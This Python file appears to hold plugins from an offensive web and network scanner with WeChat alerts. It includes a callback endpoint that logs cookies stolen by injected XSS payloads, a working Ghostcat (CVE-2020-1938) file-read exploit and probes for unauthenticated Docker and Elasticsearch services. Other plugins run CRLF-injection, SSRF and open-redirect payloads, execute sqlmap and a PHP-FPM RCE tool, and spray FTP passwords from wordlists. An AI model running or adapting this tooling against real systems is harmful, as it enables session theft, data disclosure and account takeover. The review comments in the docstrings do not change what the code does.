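def xss_prey(request):
    """Record an XSS payload callback ("prey") and notify via WeChat.

    Hit by the injected XSS payload from the victim's browser.  The client
    IP, the ``domain`` query parameter, the User-Agent and the URL-decoded
    full request path (the payload smuggles the stolen cookie there) are
    stored as one ``XssPrey`` row and a WeChat notification is sent.  Always
    answers ``{"status":"ok"}`` so the payload never sees an error.

    Security notes:
      * ``X-Forwarded-For`` is client-controlled.  Only the first (leftmost)
        hop is kept, but even that is spoofable unless a trusted proxy
        rewrites the header -- treat ``ip`` as informational, not evidence.
      * ``domain``, ``user_agent`` and ``cookie`` are attacker-supplied and
        stored verbatim; whatever renders them later (dashboard, WeChat
        message) must escape them, or a row here becomes a second-order XSS.
      * The original ``.replace("'", "\\'")`` calls were no-ops (``"\\'"`` is
        just ``'``); the ORM parameterises values, so they are dropped.
    """
    forwarded = request.META.get('HTTP_X_FORWARDED_FOR')
    if forwarded:
        # XFF is a comma-separated chain "client, proxy1, ..."; keep the client entry.
        ip = forwarded.split(',')[0].strip()
    else:
        ip = request.META.get('REMOTE_ADDR', '0.0.0.0')
    domain = request.GET.get('domain', 'Unknown')
    user_agent = request.META.get('HTTP_USER_AGENT', 'Unknown')
    full_path = unquote(request.get_full_path())
    logger.debug(full_path)
    cookie = full_path
    logger.info(cookie)
    try:
        XssPrey.objects.update_or_create(domain=domain, user_agent=user_agent, cookie=cookie, ip=ip)
        title = '发现XSS猎物'
        content = domain
        wechat.send_msg(title, content)
    except Exception as e:
        logger.critical(e)
    return HttpResponse('{"status":"ok"}', content_type='application/json')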
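def start(**kwargs):
    """Probe every port whose service name contains "docker" for an
    unauthenticated Docker Remote API.

    Sends ``GET /containers/json`` over a raw TCP socket; a ``200 OK`` whose
    headers carry ``Docker`` and ``Api-Version`` means the daemon answers
    without authentication (equivalent to root on that host).  One ``Risk``
    row per IP is created/updated and a WeChat notification is sent.

    kwargs: ``policy`` is read for interface parity with the other plugins
    but does not narrow the target set -- every matching port is rescanned
    and nothing is marked as scanned.
    """
    policy = kwargs['policy']  # accepted, unused (see docstring)
    socket.setdefaulttimeout(2)
    ports = Port.objects.filter(service_name__icontains='docker')
    if not ports:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
    for port in ports:
        port_num = port.port_num
        ip = port.asset.ip
        logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))
        try:
            # Context manager closes the socket on every path; the original
            # leaked one descriptor per target (and per exception).
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.connect((ip, port_num))
                payload = "GET /containers/json HTTP/1.1\r\nHost: %s:%s\r\n\r\n" % (ip, port_num)
                s.sendall(payload.encode())
                recv = s.recv(1024)
            if b"HTTP/1.1 200 OK" in recv and b'Docker' in recv and b'Api-Version' in recv:
                logger.info('%-30s%-30s' % ('[$$$]success, ', "[True], this host is vulnerable"))
                # recv is raw bytes chosen by the scanned host; it is stored and
                # forwarded verbatim, so consumers must treat desc as untrusted.
                desc = 'Docker未授权访问漏洞,获取到如下信息:\n' + str(recv)
                Risk.objects.update_or_create(target=ip, risk_type='docker未授权访问', defaults={'desc': desc})
                title = 'docker未授权访问'
                content = desc
                wechat.send_msg(title, content)
        except Exception as e:
            logger.error(e)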
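def start(**kwargs):
    """Check AJP listeners (port 8009) on the given assets for Ghostcat
    (CVE-2020-1938).

    The AJP request carries ``javax.servlet.include.*`` attributes that make
    Tomcat's DefaultServlet include ``/WEB-INF/web.xml``; a response body
    containing ``web-app`` proves the arbitrary-file-read primitive.  A
    ``Risk`` is recorded per port and a WeChat message sent.

    kwargs: ``policy`` (accepted, unused) and ``assets`` (asset ids to scan).
    """
    policy = kwargs['policy']
    assets = kwargs['assets']
    socket.setdefaulttimeout(2)
    ports = Port.objects.filter(asset_id__in=assets, port_num=8009)
    for port in ports:
        port_num = port.port_num
        ip = port.asset.ip
        logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))
        try:
            t = Tomcat(ip, port_num)
            # Any URI that maps to no real servlet will do.  The original
            # literal '/hissec{".jsp" if args.rce else ""}' was a botched
            # f-string (no f prefix, and no `args` in scope) sent verbatim;
            # '/hissec' is the non-RCE branch it meant.
            _, data = t.perform_request('/hissec', attributes=[
                {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
                {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']},
                {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
            ])
            logger.info('----------------------------')
            # Replace undecodable bytes rather than abort the whole check.
            res = ''.join([d.data.decode('utf_8', 'replace') for d in data])
            if "web-app" in res:
                logger.info('%-30s%-30s' % ('[$$$]success, ', "[True], this host is vulnerable"))
                desc = 'cve-2020-1938 漏洞,获取到如下信息:\n' + str(res)
                Risk.objects.update_or_create(port=port, asset=port.asset, risk_type='cve-2020-1938', defaults={'desc': desc})
                title = '发现cve-2020-1938漏洞'
                content = desc
                wechat.send_msg(title, content)
        except Exception as e:
            logger.error(e)
        logger.info('-' * 75)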
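def start(**kwargs):
    """Detect Elasticsearch instances on port 9200 that serve ``/_cat``
    anonymously.

    Both http and https are tried.  ``policy == 'full'`` rescans every 9200
    port; any other policy skips ports already marked as scanned by this
    plugin.  A hit records a ``Risk`` keyed on the URL and sends a WeChat
    message; the port is marked scanned after both protocols were tried.
    """
    policy = kwargs['policy']
    if policy == 'full':
        ports = Port.objects.filter(port_num='9200')
    else:
        ports = Port.objects.exclude(scanned__icontains=plugin).filter(port_num=9200)
    if not ports:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
    protocols = ['http', 'https']
    for port in ports:
        ip = port.asset.ip
        for protocol in protocols:
            try:
                url = "%s://%s:%s/_cat" % (protocol, ip, port.port_num)
                logger.debug("[%s] [%s] %s" % (plugin, port.id, url))
                # timeout: the original call had none and could hang the whole
                # scan on a black-holed port.  verify=False matches the other
                # plugins -- targets use self-signed certs and we only need
                # reachability, not identity.
                response = requests.get(url, timeout=10, verify=False)
                if "/_cat/master" in response.text:
                    logger.info('[$$$]success, 可以匿名访问')
                    Risk.objects.update_or_create(target=url, risk_type='elasticsearch匿名访问', defaults={'desc': 'elasticsearch匿名访问, ' + url})
                    logger.info("[True], this host is vulnerable")
                    title = 'elasticsearch匿名访问'
                    content = url
                    wechat.send_msg(title, content)
            except Exception as e:
                logger.error(e)
        update_scan_status(port, plugin)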
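def check(obj):
    """Test one web target for CRLF / HTTP response-header injection.

    Two vectors per entry of the module-level ``payloads`` list: the payload
    appended to the URL path, and the payload inside an ``x-request-id``
    request header (catches servers that reflect request ids into response
    headers).  The payloads inject a response header named ``dandh811``;
    its presence in ``res.headers`` is the success signal.

    ``obj`` is a row with ``url`` (preferred) or ``subdomain``.  Bare-IP
    targets are skipped.  Findings are stored as ``Risk`` rows of type
    ``CRLF注入`` and pushed to WeChat; the object is marked scanned at the
    end regardless of outcome.

    Fixes: ``settings.HTTP_HEADERS`` is copied instead of mutated in place
    (the original wrote the CRLF payload into the process-wide header dict,
    so every later request of every plugin carried it), each vector gets its
    own header dict, and a 4xx/5xx response is no longer discarded
    (``bool(Response)`` is ``Response.ok`` -- an injected header on a 404
    page is just as real).
    """
    try:
        url = obj.url
    except AttributeError:
        url = obj.subdomain + '/'
    if url_is_ip(url):
        return
    base_headers = dict(settings.HTTP_HEADERS)
    for payload in payloads:
        _url = url + payload
        logger.debug("[%s] [%s] %s" % (plugin, obj.id, _url))
        try:
            res = requests.get(_url, headers=dict(base_headers), timeout=10, verify=False, allow_redirects=False)
        except Exception:
            res = None
        if res is not None:
            try:
                if 'dandh811' in res.headers.keys():
                    logger.info('[$$$] %s , 该域名存在漏洞' % _url)
                    Risk.objects.update_or_create(target=url, risk_type='CRLF注入', defaults={"desc": _url + '\n' + payload})
                    title = '发现HTTP头注入漏洞'
                    content = _url
                    wechat.send_msg(title, content)
            except Exception as e:
                logger.critical(e)
        try:
            hdr_headers = dict(base_headers)
            hdr_headers["x-request-id"] = 'test' + payload
            res = requests.get(url, headers=hdr_headers, timeout=10, verify=False, allow_redirects=False)
        except Exception:
            continue
        try:
            if 'dandh811' in res.headers.keys():
                Risk.objects.update_or_create(target=url, risk_type='CRLF注入', defaults={"desc": _url + '\n' + payload})
                logger.info('success, 该域名存在漏洞')
                title = '发现HTTP头注入漏洞'
                content = _url
                wechat.send_msg(title, content)
        except Exception as e:
            logger.critical(e)
    update_scan_status(obj, plugin)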
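def start(**kwargs):
    """Run the HTTP request-smuggling probe against every web app.

    ``policy == 'increase'`` skips apps already scanned by this plugin; any
    other value rescans all.  Targets whose host part contains no letters
    (bare IPs) are skipped.  A truthy result from ``HTTP_REQUEST_SMUGGLER``
    is stored as a ``Risk`` of type ``HTTP夹带攻击`` and pushed to WeChat.
    Progress is logged and the app marked scanned after every target.
    """
    webapps = kwargs['webapps']
    policy = kwargs['policy']
    if policy == 'increase':
        webapps = webapps.exclude(scanned__icontains=plugin).order_by('-id')
    if not webapps:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
    denominator = len(webapps)
    molecular = 0
    for webapp in webapps:
        subdomain = webapp.subdomain
        molecular += 1
        # subdomain is "scheme://host[:port]"; the text after the first ':'
        # is "//host...".  The original indexed split(':')[1] and raised
        # IndexError -- aborting the whole run -- on a value without a colon;
        # partition() yields '' then, which is simply skipped.
        host_part = subdomain.partition(':')[2]
        if not re.search('[a-z]', host_part):
            continue
        logger.info('-' * 75)
        logger.debug("[%s] [%s] %s" % (plugin, webapp.id, subdomain))
        try:
            res = HTTP_REQUEST_SMUGGLER(subdomain).run()
            if res:
                logger.info(res)
                Risk.objects.update_or_create(target=subdomain, risk_type='HTTP夹带攻击', defaults={'desc': res})
                title = '发现漏洞'
                content = "漏洞类型:" + plugin
                wechat.send_msg(title, content)
        except Exception as e:
            logger.critical(e)
        # Both branches of the original produced 100.0 on the last item.
        percent = round(1.0 * molecular / denominator * 100, 2)
        logger.warning('%s [%d/%d]' % (str(percent) + '%', molecular, denominator))
        update_scan_status(webapp, 'smuggling')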
def start(**kwargs):
    """Look for SSRF through URL-typed query parameters.

    For each stored URL whose query string *starts* with one of ``keywords``
    (``?share=``, ``?url=`` ...) the value is replaced with
    ``http://127.0.0.1:22``.  If the body echoes ``mismatch`` (sshd's
    "Protocol mismatch" banner) the server fetched loopback on our behalf.
    Only the first query parameter is ever tested because the match is on
    ``'?' + keyword + '='``.  ``policy == 'full'`` rescans everything;
    otherwise URLs already scanned by this plugin are skipped.  A URL is
    marked scanned only when the request succeeded.
    """
    policy = kwargs['policy']
    candidates = WebUrls.objects.filter(url__contains='?')
    if policy != 'full':
        candidates = candidates.exclude(scanned__icontains=plugin)
    weburls = candidates.order_by('-id')
    if not weburls:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
        return
    keywords = [
        'share', 'wap', 'url', 'link', 'src', 'source', 'target', 'u', '3g',
        'display', 'sourceURl', 'imageURL', 'domain'
    ]
    for weburl in weburls:
        for keyword in keywords:
            marker = '?' + keyword + '='
            if marker not in weburl.url:
                continue
            prefix = weburl.url.partition(marker)[0]
            url = prefix + marker + 'http://127.0.0.1:22'
            logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
            try:
                body = requests.get(url, timeout=10, verify=False, allow_redirects=False).content.decode('utf-8')
                if 'mismatch' in body:
                    logger.info(body)
                    logger.info('[$$$] success, 发现%s漏洞' % url)
                    Risk.objects.update_or_create(target=url, risk_type=plugin, defaults={'desc': url})
                    title = '发现%s漏洞' % plugin
                    content = '-'
                    wechat.send_msg(title, content)
                update_scan_status(weburl, plugin)
            except Exception as e:
                logger.critical(e)
def start(**kwargs):
    """Run sqlmap against every stored URL that carries a query string.

    ``policy == 'full'`` rescans all; otherwise URLs whose ``scanned`` field
    already mentions the literal ``'sqli'`` are skipped.  Any truthy result
    from ``sqlmap(url)`` is stored as a ``Risk`` of type ``SQL注入`` and
    announced via WeChat.  ``sqlmap`` itself runs outside the try, so an
    exception there aborts the run.  Per-URL progress is logged.
    """
    policy = kwargs['policy']
    query = WebUrls.objects.filter(url__contains='?')
    if policy != 'full':
        query = query.exclude(scanned__icontains='sqli')
    weburls = query.order_by('-id')
    if not weburls:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
        return
    denominator = len(weburls)
    for molecular, weburl in enumerate(weburls, start=1):
        url = weburl.url
        logger.info('-' * 75)
        logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
        data = sqlmap(url)
        try:
            if not data:
                logger.info('未发现漏洞')
            else:
                logger.info(data)
                logger.info('[$$$]success, 发现SQL注入漏洞')
                Risk.objects.update_or_create(target=url, risk_type='SQL注入', defaults={'desc': data})
                title = '发现SQL注入漏洞'
                content = '-'
                wechat.send_msg(title, content)
            update_scan_status(weburl, 'sqli')
        except Exception as e:
            logger.info('* %s' % e)
        if molecular == denominator:
            percent = 100.0
            logger.info('进度: %s [%d/%d]' % (str(percent)+'%', molecular, denominator))
        else:
            percent = round(1.0 * molecular / denominator * 100, 2)
            logger.info('进度 : %s [%d/%d]' % (str(percent)+'%', molecular, denominator))
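def start(**kwargs):
    """Run phuip-fpizdam (PHP-FPM, CVE-2019-11043) against PHP web apps.

    Targets are web apps whose ``other_info`` mentions ``php/``; with
    ``policy == 'increase'`` those already scanned by this plugin are
    skipped.  ``success`` in the tool's stdout is recorded as a ``Risk`` of
    type ``php漏洞`` and announced via WeChat.

    Security: ``webapp.subdomain`` is recon data harvested from the outside
    world.  The original formatted it into a single shell string and ran it
    with ``shell=True``, so a subdomain like ``a.example.com;id`` executed
    arbitrary commands as the scanner user (root, judging by the tool path).
    The tool is now invoked with an argv list and no shell.
    """
    policy = kwargs['policy']
    webapps = kwargs['webapps'].filter(other_info__icontains='php/')
    if policy == 'increase':
        webapps = webapps.exclude(scanned__icontains=plugin)
    if not webapps:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
    for webapp in webapps:
        url = webapp.subdomain
        logger.debug("[%s] [%s] %s" % (plugin, webapp.id, url))
        argv = ['/root/go/bin/phuip-fpizdam', '%s/index.php' % url]
        cmd = ' '.join(argv)  # for logging / Risk.desc only -- never handed to a shell
        logger.info(cmd)
        p = subprocess.Popen(argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = p.communicate()
        out = out.decode('utf-8', 'replace')
        logger.info(out)
        if err:
            logger.error(err.decode('utf-8', 'replace'))
        if 'success' in out:
            Risk.objects.update_or_create(target=url, risk_type='php漏洞', defaults={'desc': cmd})
            logger.info('[$$$]success')
            title = '发现漏洞'
            content = plugin
            wechat.send_msg(title, content)
        update_scan_status(webapp, plugin)
        logger.info('-' * 75)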
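def _final_url(browser, url):
    """Load ``url`` in ``browser`` and return the URL the page settled on,
    or ``'error'`` if navigation failed.

    Deliberately does not ``close()`` the window: closing the only window
    ends the WebDriver session, after which every further ``get`` raises.
    The original did that after the first payload, so only one payload per
    target was ever really exercised.
    """
    try:
        browser.get(url)
        return browser.current_url
    except Exception:
        return 'error'


def _shutdown(browser):
    """Quit the driver, then sweep leftover Chrome processes (best effort).

    ``pkill chrome`` kills every Chrome on the host, not only this driver's;
    run this plugin on a dedicated scanner box.  It runs without a shell.
    """
    try:
        browser.quit()
    except Exception as e:
        logger.critical(e)
    try:
        subprocess.call(['pkill', 'chrome'])
    except Exception as e:
        logger.critical(e)


def start(**kwargs):
    """Open-redirect scanner driven by headless Chrome.

    Two passes:
      1. Every stored URL (``WebUrls``): each query parameter named in
         ``keywords`` is replaced with each of ``payloads``; if the browser
         ends up on ``www.baidu...`` the parameter is an open redirect.
      2. Every web app root (``webapps``): each of ``payloads2`` is appended
         directly to the root URL.

    ``policy == 'full'`` rescans everything; otherwise rows already scanned
    by this plugin are skipped.  Bare-IP URLs are skipped in pass 1.  Hits
    become ``Risk`` rows of type ``开放重定向`` and a WeChat message.

    Fixes relative to the original: the mutated ``_url`` is what gets loaded
    (the original navigated to the unmodified ``url``, so no payload was
    ever sent, and logged ``url`` instead of ``_url``); the browser is not
    closed between payloads; the browser is always quit even when a DB or
    WeChat call raises; scanning stops at the first hit per target.
    """
    webapps = kwargs['webapps']
    policy = kwargs['policy']
    keywords = [
        'next', 'url', 'return', 'redirect_url', 'callback_url', 'callback', 'r', 'target', 'error',
        'errurl', 'error_url', 'redirect', 'redirect_to', 'jump', 'jump_to', 'to', 'link', 'linkto',
        'domain', 'u', 'continue', 'back_url'
    ]
    # NOTE(review): 'https://[email protected]' looks like an e-mail-obfuscation
    # artifact of the page this was copied from, not a real payload -- confirm.
    payloads = [
        r'\baidu.com', '/baidu.com', '//baidu.com', '///baidu.com', '////baidu.com',
        'https://[email protected]', '#baidu.com', '?baidu.com', r'\\baidu.com', '.baidu',
        '.baidu.com', '///baidu.com//..', '////baidu.com//..', '/http://baidu.com'
    ]
    chrome_options = Options()
    chrome_options.add_argument('--no-sandbox')
    chrome_options.add_argument('--headless')
    chrome_options.add_argument('--disable-dev-shm-usage')
    if policy == 'full':
        weburls = WebUrls.objects.order_by('-id')
    else:
        weburls = WebUrls.objects.exclude(scanned__icontains=plugin)
        webapps = webapps.exclude(scanned__icontains=plugin)
    if not weburls:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
    for weburl in weburls:
        url = parse.unquote(weburl.url, 'utf-8')
        if url_is_ip(url):
            continue
        logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
        try:
            browser = webdriver.Chrome(executable_path='/opt/tools/chromedriver', chrome_options=chrome_options)
        except Exception as e:
            logger.critical(e)
            continue
        try:
            risk = False
            params = parse.parse_qs(parse.urlparse(url).query)
            for param, values in params.items():
                if risk or param not in keywords:
                    continue
                for payload in payloads:
                    # Plain text substitution on the decoded URL.  parse_qs also
                    # decodes, so a value that was percent-encoded in the stored
                    # URL may not be found and the URL is then sent unchanged.
                    _url = url.replace(param + '=' + values[0], param + '=' + payload)
                    logger.debug("[%s] [%s] %s" % (plugin, weburl.id, _url))
                    if 'www.baidu' in _final_url(browser, _url):
                        logger.info('[$$$] success, 发现漏洞')
                        Risk.objects.update_or_create(target=url, risk_type='开放重定向', defaults={"desc": _url})
                        title = '发现开放重定向漏洞'
                        content = '-'
                        wechat.send_msg(title, content)
                        risk = True
                        break
        except Exception as e:
            logger.critical(e)
        finally:
            _shutdown(browser)
        update_scan_status(weburl, plugin)
    if not webapps:
        logger.debug("[%s] %s" % (plugin, 'There are no objects to scan'))
    payloads2 = [
        r'\baidu.com', '/baidu.com', '//baidu.com', '///baidu.com', '////baidu.com', '#baidu.com',
        '?baidu.com', r'\\baidu.com', '///baidu.com//..', '////baidu.com//..', '/http://baidu.com'
    ]
    for webapp in webapps:
        try:
            browser = webdriver.Chrome(executable_path='/opt/tools/chromedriver', chrome_options=chrome_options)
        except Exception as e:
            logger.critical(e)
            continue
        try:
            for payload in payloads2:
                url = webapp.subdomain + payload
                logger.debug("[%s] [%s] %s" % (plugin, webapp.id, url))
                if 'www.baidu' in _final_url(browser, url):
                    logger.info('[$$$] success, 发现漏洞')
                    Risk.objects.update_or_create(target=url, risk_type='开放重定向', defaults={"desc": url})
                    title = '发现开放重定向漏洞'
                    content = url
                    wechat.send_msg(title, content)
                    break
        except Exception as e:
            logger.critical(e)
        finally:
            _shutdown(browser)
        update_scan_status(webapp, plugin)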
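def start(**kwargs):
    """Banner-probe ports whose service name contains ``plugin`` for an
    unauthenticated service.

    Sends the bytes ``success`` and looks for ``Environment`` in the reply.
    ``policy == 'full'`` rescans all matching ports; otherwise ports already
    scanned by this plugin are skipped -- but nothing here ever marks a port
    as scanned, so that exclusion never takes effect.  Hits are stored as
    ``Risk`` rows and a single WeChat message is sent at the end.

    NOTE(review): the Risk row is labelled ``zabbix`` while the WeChat
    message says ``zookeeper``; which service ``plugin`` names cannot be
    told from here, so one of the two labels is wrong.  The commented-out
    redis password spray that lived here was removed.
    """
    policy = kwargs['policy']
    ports = Port.objects.filter(service_name__icontains=plugin)
    if policy != 'full':
        ports = ports.exclude(scanned__icontains=plugin)
    if not ports:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
    has_risk = False
    socket.setdefaulttimeout(10)  # hoisted; the original reset it every iteration
    for port in ports:
        ip = port.asset.ip
        try:
            logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))
            # Context manager closes the socket on every path; the original
            # leaked one descriptor per port.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.connect((ip, port.port_num))
                s.sendall("success".encode('utf-8'))
                result = s.recv(1024).decode('utf-8', 'replace')
            if "Environment" in result:
                logger.info('+ Found Vul: \033[0;32m %s, %s\033[0m' % (ip, str(port.port_num)))
                desc = 'zabbix未授权访问'
                Risk.objects.update_or_create(target=port.asset.ip, risk_type='zabbix漏洞', defaults={'desc': desc})
                has_risk = True
        except Exception as e:
            logger.error(e)
    if has_risk:
        title = '风险提示'
        content = "发现zookeeper漏洞"
        wechat.send_msg(title, content)
    logger.info('-' * 100)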
def get_reports(result: dict, webapp) -> None:  # fetch the scan report for result['scan_id']
    """Poll an AWVS scan until it finishes, download its HTML report and
    record high-severity findings on ``webapp``.

    ``result`` is the dict returned when the scan was started; it is read
    for ``['target']['address']``, ``['scan_id']`` and ``['target_id']``.
    Every 10 s ``get_status(result)`` is asked for the scan state:
      * ``'completed'``: request a report (template id below), poll every 3 s
        until it has a download URL, write it to
        ``settings.BASE_DIR + '/files/reports/<scan_id>.html'``, then query
        ``severity:3`` vulnerabilities for this target (``ignore_vuls``
        excluded), store them as one ``Risk`` (type ``awvs扫描漏洞``), notify
        via WeChat, ``webapp.save()`` and return.
      * ``'aborted'``: return without saving.
      * anything else: keep polling (no upper bound).

    Report template ids known for this AWVS instance:
      11111111-1111-1111-1111-111111111111 Developer
      21111111-1111-1111-1111-111111111111 XML
      11111111-1111-1111-1111-111111111119 OWASP Top 10 2013
      11111111-1111-1111-1111-111111111112 Quick

    Caveats: a failed report request or download calls ``sys.exit()``,
    which kills the whole worker process, not just this scan.  All AWVS
    calls use ``verify=False``.  ``scan_id`` is spliced into a filesystem
    path; it comes from the scanner's own API, so this is trusted only as
    far as that API is.  ``url`` and ``count`` are assigned but never used.
    """
    url = result['target']['address']
    count = 0
    while True:
        time.sleep(10)
        res = get_status(result)
        if res == 'completed':
            scan_id = result['scan_id']
            target_id = result['target_id']
            data = {"template_id": "11111111-1111-1111-1111-111111111111", "source": {"list_type": "scans", "id_list": [scan_id]}}
            try:
                response = requests.post(host + "api/v1/reports", data=json.dumps(data), headers=api_header, timeout=30, verify=False)
                scan_result = response.headers
                # AWVS answers 201 with the report resource in Location.
                loc = scan_result['Location']
            except Exception as e:
                logger.info('* %s' % e)
                sys.exit()
            logger.info('+ %s 扫描完成,正在生成报告 ...' % (time.strftime("%H:%M:%S")))
            # Poll the report resource until it exposes a download list.
            while True:
                time.sleep(3)
                try:
                    response = requests.get(host.strip('/') + loc, headers=api_header, timeout=30, verify=False)
                    res = json.loads(response.content.decode('utf-8'))  # res is now the report JSON
                    if res['download']:
                        break
                except Exception as e:
                    logger.info(e)
            logger.info('+ %s 报告生成完毕,下载中 ...' % (time.strftime("%H:%M:%S", time.localtime(time.time()))))
            try:
                report_download_url = res['download'][0]
                report_response = requests.get(host.strip('/') + report_download_url, headers=api_header, timeout=30, verify=False)
                report_path_ = '/files/reports/' + scan_id + '.html'
                logger.info('+ 报告存储路径: %s' % report_path_)
                report_path = settings.BASE_DIR + report_path_
                with open(report_path, 'wb') as f:
                    f.write(report_response.content)
            except Exception as e:
                logger.info('* %s' % e)
                sys.exit()
            webapp.report = report_path_
            try:
                # severity:3 == high; the query is instance-wide, so filter by target_id below.
                response = requests.get(host + 'api/v1/vulnerabilities?q=severity:3', headers=api_header, timeout=30, verify=False)
                res = json.loads(response.content.decode('utf-8'))
                vul_names = []
                ignore_vuls = ['nginx Integer Overflow']
                for vul in res['vulnerabilities']:
                    if vul['target_id'] == target_id and vul['vt_name'] not in ignore_vuls:
                        vul_names.append(vul['vt_name'])
                if vul_names:
                    for vul_name in vul_names:
                        logger.info('--- %s' % vul_name)
                    desc = '\n'.join(vul_names)
                    # update_or_create returns (obj, created); keep the row.
                    risk = Risk.objects.update_or_create(target=webapp.subdomain, risk_type='awvs扫描漏洞', defaults={'desc': desc})
                    webapp.risk = risk[0]
                    title = 'awvs扫描漏洞'
                    content = desc
                    wechat.send_msg(title, content)
                else:
                    logger.info('+ 未发现高风险漏洞')
            except Exception as e:
                logger.info('* %s' % e)
            webapp.save()
            logger.info('+ %s 报告已保存' % (time.strftime("%H:%M:%S", time.localtime(time.time()))))
            break
        if res == 'aborted':
            break
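def _ftp_login(ftp, ip, port_num, user, password):
    """Attempt one FTP login; return True on success.

    If the control connection has died (``EOFError``/``OSError`` -- many
    servers drop a client after a few bad passwords, after which every
    later ``login`` on the same object fails identically) reconnect once
    and retry, so the spray keeps going instead of silently finding nothing.
    """
    try:
        ftp.login(user, password)
        return True
    except ftplib.error_perm:
        return False
    except (EOFError, OSError):
        try:
            ftp.close()
            ftp.connect(ip, port_num, timeout=5)
            ftp.login(user, password)
            return True
        except Exception:
            return False
    except Exception:
        return False


def start(**kwargs):
    """FTP anonymous-login and weak-credential check.

    Targets are ports whose service name contains ``plugin``; with a policy
    other than ``'full'`` ports already scanned by this plugin are skipped.
    Usernames/passwords come from ``brute/usernames.txt`` and
    ``brute/passwords.txt`` under ``settings.BASE_DIR`` (one per line).

    Per port: connect (5 s timeout); try anonymous login (``'' / ''``,
    which ftplib sends as ``anonymous``); if that fails, try every
    username/password pair and stop at the first that works.  Hits are
    stored as ``Risk`` rows (``ftp匿名登录`` / ``ftp弱口令``) and pushed to
    WeChat; the port is marked scanned in every case.

    Caveats:
      * A port that does not accept a TCP connection is DELETED from the
        database (original behaviour, kept).  A transient timeout therefore
        erases the record; consider marking instead of deleting.
      * The found password is written to the log and to ``Risk.desc`` in
        clear text; anyone with log access sees it.
      * Changes from the original: one ``FTP`` object per port, always
        closed; anonymous hits also send a notification and no longer skip
        ``update_scan_status``; the spray stops at the first valid pair
        (the ``Risk`` row is keyed on target+type, so only one pair was ever
        kept anyway).
    """
    policy = kwargs['policy']
    ports = Port.objects.filter(service_name__icontains=plugin)
    if policy != 'full':
        ports = ports.exclude(scanned__icontains=plugin)
    if not ports:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
    with open(settings.BASE_DIR + 'brute/usernames.txt', 'r') as f:
        usernames = [line.strip() for line in f]
    with open(settings.BASE_DIR + 'brute/passwords.txt', 'r') as f:
        passwords = [line.strip() for line in f]
    for port in ports:
        ip = port.asset.ip
        logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))
        ftp = ftplib.FTP()
        try:
            ftp.connect(ip, port.port_num, timeout=5)
            logger.info('ftp端口可以连接')
        except Exception as e:
            logger.error(e)
            port.delete()
            logger.info('FTP端口连接失败,删除端口')
            continue
        try:
            if _ftp_login(ftp, ip, port.port_num, '', ''):
                logger.info('[$$$] FTP登录成功!')
                Risk.objects.update_or_create(target=ip, risk_type='ftp匿名登录', defaults={'desc': 'ftp匿名登录'})
                wechat.send_msg('ftp匿名登录', '-')
            else:
                for username in usernames:
                    hit = None
                    for password in passwords:
                        if _ftp_login(ftp, ip, port.port_num, username, password):
                            hit = password
                            break
                    if hit is not None:
                        logger.info('[$$$] FTP登录成功!')
                        logger.info('[$$$]success, %s:%s' % (username, hit))
                        Risk.objects.update_or_create(target=ip, risk_type='ftp弱口令', defaults={'desc': '%s:%s' % (username, hit)})
                        title = 'ftp弱口令'
                        content = '-'
                        wechat.send_msg(title, content)
                        break
        finally:
            ftp.close()
        update_scan_status(port, plugin)
        logger.info('-' * 75)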